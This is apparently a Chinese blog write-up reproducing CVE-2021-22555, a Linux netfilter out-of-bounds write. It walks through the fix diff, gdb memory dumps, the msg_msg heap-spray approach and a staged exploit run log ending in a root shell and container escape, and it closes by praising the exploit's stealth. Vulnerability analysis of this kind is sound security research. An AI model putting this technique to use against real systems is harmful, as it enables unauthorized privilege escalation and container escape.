CVE-2021-22555 是 netfilter 模块中的一个越界写(OOB,out-of-bounds write)漏洞,到 2021 年修复时已经存在了 15 年。问题出现在 x64 内核上加载 x86(32 位)格式的 xt table 消息时:两种格式 padding 的差异引起了越界写。该问题在 v2.6.19-rc1(commit 9fa492cdc160cd27ce1046cb36f47d3b2b1efa21)引入,在 2021 年 4 月由 commit b29c457a6511435960115c0f548c4360d5f4801d 修复。
漏洞原理
diff --git a/net/netfilter/x_tables.c b/net/netfilter/x_tables.c
index 6bd31a7a27fc..92e9d4ebc5e8 100644
--- a/net/netfilter/x_tables.c
+++ b/net/netfilter/x_tables.c
@@ -733,7 +733,7 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
{
const struct xt_match *match = m->u.kernel.match;
struct compat_xt_entry_match *cm = (struct compat_xt_entry_match *)m;
- int pad, off = xt_compat_match_offset(match);
+ int off = xt_compat_match_offset(match);
u_int16_t msize = cm->u.user.match_size;
char name[sizeof(m->u.user.name)];
@@ -743,9 +743,6 @@ void xt_compat_match_from_user(struct xt_entry_match *m, void **dstptr,
match->compat_from_user(m->data, cm->data);
else
memcpy(m->data, cm->data, msize - sizeof(*cm));
- pad = XT_ALIGN(match->matchsize) - match->matchsize;
- if (pad > 0)
- memset(m->data + match->matchsize, 0, pad);
msize += off;
m->u.user.match_size = msize;
@@ -1116,7 +1113,7 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
{
const struct xt_target *target = t->u.kernel.target;
struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
- int pad, off = xt_compat_target_offset(target);
+ int off = xt_compat_target_offset(target);
u_int16_t tsize = ct->u.user.target_size;
char name[sizeof(t->u.user.name)];
@@ -1126,9 +1123,6 @@ void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
target->compat_from_user(t->data, ct->data);
else
memcpy(t->data, ct->data, tsize - sizeof(*ct));
- pad = XT_ALIGN(target->targetsize) - target->targetsize;
- if (pad > 0)
- memset(t->data + target->targetsize, 0, pad);
tsize += off;
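漏洞触发路径: __sys_setsockopt(fd, level, optname, optval, optlen) -> ... -> nf_setsockopt -> do_ipt_set_ctl -> compat_do_replace -> translate_compat_table -> compat_copy_entry_from_user -> xt_compat_target_from_user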
OOB触发后,紧邻的下一个页开头会有两个字节被设置成0(对比下面前后两次 x/20a 的输出,0xffff888108c9b000 处的值由 0xffff888108f82000 变成了 0xffff888108f80000):
(gdb) list
1126 memcpy(t->data, ct->data, tsize - sizeof(*ct));
1127 pad = XT_ALIGN(target->targetsize) - target->targetsize;
1128 if (pad > 0)
1129 memset(t->data + target->targetsize, 0, pad);
1130
1131 tsize += off;
1132 t->u.user.target_size = tsize;
1133 strlcpy(name, target->name, sizeof(name));
1134 module_put(target->me);
1135 strncpy(t->u.user.name, name, sizeof(t->u.user.name));
(gdb) p t
$104 = (struct xt_entry_target *) 0xffff888108c9afda
(gdb) p t->data
$105 = 0xffff888108c9affa ""
(gdb) x/a t->data
0xffff888108c9affa: 0x0 <fixed_percpu_data>
(gdb) p *t
$106 = {u = {user = {target_size = 32, name = "NFQUEU\240\2264\203\377\377\377\377", '\000' <repeats 14 times>, revision = 1 '\001'}, kernel = {target_size = 32,
target = 0xffffffff833496a0 <nfqueue_tg_reg+128>}, target_size = 32}, data = 0xffff888108c9affa ""}
(gdb) p/x t
$107 = 0xffff888108c9afda
(gdb) p target->targetsize
$108 = 4
(gdb) p/x 0xffff888108c9affa + 4
$109 = 0xffff888108c9affe
(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000: 0xffff888108f82000 0xffff8881023f64c0
0xffff888108c9b010: 0x41 0xfd0
(gdb) x/20a 0xffff888108c9affe + 2
0xffff888108c9b000: 0xffff888108f80000 0xffff8881023f64c0
0xffff888108c9b010: 0x41 0xfd0
stack:
(gdb) bt
#0 xt_compat_target_from_user (t=0xffff888108c9afda, dstptr=dstptr@entry=0xffffc90000ae3ac8, size=size@entry=0xffffc90000ae3ac4) at net/netfilter/x_tables.c:1131
#1 0xffffffff81f77bbb in compat_copy_entry_from_user (base=<optimized out>, newinfo=<error reading variable: Cannot access memory at address 0x0>, size=0xffffc90000ae3ac4,
dstptr=0xffffc90000ae3ac8, e=0xffff888108c99040) at net/ipv4/netfilter/ip_tables.c:1376
#2 translate_compat_table (net=net@entry=0xffff8881053f33c0, pinfo=pinfo@entry=0xffffc90000ae3b80, pentry0=pentry0@entry=0xffffc90000ae3b88, compatr=compatr@entry=0xffffc90000ae3b94)
at net/ipv4/netfilter/ip_tables.c:1440
#3 0xffffffff81f78974 in compat_do_replace (net=net@entry=0xffff8881053f33c0, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1517
#4 0xffffffff81f78d4d in do_ipt_set_ctl (sk=<optimized out>, cmd=64, arg=..., len=4114) at net/ipv4/netfilter/ip_tables.c:1624
#5 0xffffffff81e1c64a in nf_setsockopt (sk=sk@entry=0xffff888105c31a40, pf=pf@entry=2 '\002', val=val@entry=64, opt=..., len=len@entry=4114) at net/netfilter/nf_sockopt.c:101
#6 0xffffffff81efd387 in ip_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=4114) at net/ipv4/ip_sockglue.c:1435
#7 0xffffffff81f0a564 in tcp_setsockopt (sk=0xffff888105c31a40, level=<optimized out>, optname=64, optval=..., optlen=<optimized out>) at net/ipv4/tcp.c:3598
#8 0xffffffff81d17a6a in sock_common_setsockopt (sock=<optimized out>, level=<optimized out>, optname=<optimized out>, optval=..., optlen=<optimized out>) at net/core/sock.c:3249
#9 0xffffffff81d15e64 in __sys_setsockopt (fd=<optimized out>, level=<optimized out>, optname=<optimized out>, user_optval=0xffb44c0a "", optlen=<optimized out>) at net/socket.c:2115
#10 0xffffffff81d98631 in __do_compat_sys_socketcall (args=0xffb44ba8, call=14) at net/compat.c:492
#11 __se_compat_sys_socketcall (args=<optimized out>, call=14) at net/compat.c:424
#12 __ia32_compat_sys_socketcall (regs=<optimized out>) at net/compat.c:424
#13 0xffffffff821710e2 in do_syscall_32_irqs_on (nr=<optimized out>, regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:77
#14 __do_fast_syscall_32 (regs=regs@entry=0xffffc90000ae3f58) at arch/x86/entry/common.c:139
#15 0xffffffff821711f4 in do_fast_syscall_32 (regs=0xffffc90000ae3f58) at arch/x86/entry/common.c:164
#16 0xffffffff8217124f in do_SYSENTER_32 (regs=<optimized out>) at arch/x86/entry/common.c:207
#17 0xffffffff8220164a in entry_SYSENTER_compat () at arch/x86/entry/entry_64_compat.S:139
#18 0x0000000000000000 in ?? ()
利用主要借助message queue:
MSGOP(2) System Calls Manual MSGOP(2)
NAME
msgrcv, msgsnd - System V message queue operations
LIBRARY
Standard C library (libc, -lc)
SYNOPSIS
#include <sys/msg.h>
int msgsnd(int msqid, const void msgp[.msgsz], size_t msgsz,
int msgflg);
ssize_t msgrcv(int msqid, void msgp[.msgsz], size_t msgsz, long msgtyp,
int msgflg);
DESCRIPTION
The msgsnd() and msgrcv() system calls are used to send messages to, and receive messages from, a System V message queue. The calling process must have write permission on
the message queue in order to send a message, and read permission to receive a message.
The msgp argument is a pointer to a caller-defined structure of the following general form:
struct msgbuf {
long mtype; /* message type, must be > 0 */
char mtext[1]; /* message data */
};
The mtext field is an array (or other structure) whose size is specified by msgsz, a nonnegative integer value. Messages of zero length (i.e., no mtext field) are permitted.
The mtype field must have a strictly positive integer value. This value can be used by the receiving process for message selection (see the description of msgrcv() below).
message queue 在内核中的主要结构是 struct msg_msg
:
/* offset | size */ type = struct msg_msg {
/* 0 | 16 */ struct list_head {
/* 0 | 8 */ struct list_head *next;
/* 8 | 8 */ struct list_head *prev;
/* total size (bytes): 16 */
} m_list;
/* 16 | 8 */ long m_type;
/* 24 | 8 */ size_t m_ts;
/* 32 | 8 */ struct msg_msgseg *next;
/* 40 | 8 */ void *security;
/* total size (bytes): 48 */
}
同一个queue中的message(可以有不同的类型m_type)组成一个双向链表,由m_list串起来。从上面的内存分布可以看出,msg_msg的第一个成员就是m_list的next指针。
主要的利用思路:
- 构造
kernel config
make defconfig
make kvm_guest.config
修改CONFIG_USER_NS=y
KROP中使用了rbp恢复原始的调用栈,需要 CONFIG_FRAME_POINTER=y
msgsnd() -> alloc_msg:每一片最大分配4K(PAGE_SIZE);第一片的数据最大为 4K - 0x30(减去 struct msg_msg 头部的48字节),后续各片的数据最大为 4K - 8(减去 struct msg_msgseg 头部):
#define DATALEN_MSG ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))
编译:先安装32位编译支持 sudo apt install gcc-multilib,
然后执行 gcc -m32 -static -o poc exploit.c
done:
[+] STAGE 0: Initialization
[ 100.821096] IPVS: ftp: loaded support on port[0] = 21
[*] Initializing sockets and message queues...
[*] Initialize done sockets and message queues: 3
[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...s: 3
[*] Searching for corrupted primary message...
[+] fake_idx: ffa
[+] real_idx: fda
[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] primary message kheap_addr: ffff888110091000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] Got secondary message (current UAF buf) kheap_addr: ffff888109000000
[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffff829d66c0
[+] kbase_addr: ffffffff81000000
[*] Leaking and freeing pipe_buffer object...
[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.
[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@wintermute:/#
总结
该漏洞从2.6内核开始已经存在了很多年。本次复现采用的技术中,利用了RBP恢复利用前的调用栈。
整个利用过程相当于在正常执行流中悄悄执行了几个函数,然后又恢复了正常的流程。
这几个额外调用的函数,完成了权限提升,容器逃逸。
利用过程没有任何新的进程产生,没有任何新的文件产生,也没有文件修改,也没有新连接。
仅仅是切换了权限和进程空间!
利用完美,非常隐蔽。
文档信息
- 本文作者:seamaner
- 本文链接:https://seamaner.github.io/2025/04/26/CVE-2021-22555/
- 版权声明:自由转载-非商用-非衍生-保持署名(创意共享3.0许可证)